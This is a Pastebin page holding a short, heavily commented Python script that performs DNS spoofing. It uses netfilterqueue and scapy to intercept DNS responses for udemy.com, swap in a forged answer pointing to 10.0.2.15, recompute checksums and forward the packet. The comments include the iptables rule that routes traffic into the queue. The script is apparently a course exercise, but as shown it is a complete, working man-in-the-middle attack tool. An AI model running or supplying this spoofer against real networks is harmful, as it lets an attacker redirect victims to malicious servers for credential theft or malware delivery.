API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 29th, 2020
113
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.55 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. import netfilterqueue
  3. import scapy.all as scapy
  4. import subprocess
  5.  
  6. def process_packet(packet):
  7.     #RR - Resoucre Record(Response) QR-Question Record(Request)
  8.     #method get_payload() gives all information that packets contain
  9.     #we have to convert get_payload() method to a scapy
  10.     #so we can use all stuff that scapy allows us. See layers,modify it fields etc..
  11.     #qname means DNS of site (eg: bing.com)
  12.     scapy_packet = scapy.IP(packet.get_payload())
  13.     #if packet contains a dns response
  14.     if scapy_packet.haslayer(scapy.DNSRR):
  15.         #if that dns response is response to a website that we want to target
  16.         qname = scapy_packet[scapy.DNSQR].qname
  17.         if 'udemy.com' in qname.decode():
  18.             print('[+] Spoofing target..')
  19.             #creating our own ANSWER and fill it
  20.             #rrname - response name(dns that target want to access) We have already captured that in qname
  21.             #whenewr target wants to acces zsecurity.org we will spoof it rdata
  22.             #rdata - IP returned as a requested dns
  23.             answer = scapy.DNSRR(rrname=qname, rdata='10.0.2.15')
  24.             #We want to access DNS answer field. As usually in scapy we access it that way:
  25.             #That command spoof original packet to our custom
  26.             scapy_packet[scapy.DNS].an = answer
  27.             #we have to change ancound field
  28.             #ancount - how many responses was sent. In our case we send only 1 response and change this field for 1
  29.             scapy_packet[scapy.DNS].ancount = 1
  30.             #IP and UDP layers contain fields that check if packet was changed.
  31.             #This fields is len and chksum. All we have to do is just delete this fields and scapy will do all work for as
  32.             del scapy_packet[scapy.IP].len
  33.             del scapy_packet[scapy.IP].chksum
  34.             del scapy_packet[scapy.UDP].len
  35.             del scapy_packet[scapy.UDP].chksum
  36.             #Last step is accept modifying packet, so now we actually have to give our modify packet to packet.accept() to send it
  37.             packet.set_payload(bytes(scapy_packet))
  38.     packet.accept()
  39.  
  40.  
  41.  
  42. #subprocess.call('iptables -I FORWARD -j NFQUEUE --queue-num 0', shell=True)
  43. #instance of netfilterqueue object
  44. queue = netfilterqueue.NetfilterQueue()
  45. #bind, so we can have access to iptables queue
  46. #process_packet is func that will be executed on each packet
  47. #that will be trap in queue
  48. #0 is because we named like that our queue in iptables
  49. #iptables -I FORWARD -j NFQUEUE --queue-num 0
  50. queue.bind(0, process_packet)
  51. queue.run()
  52.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!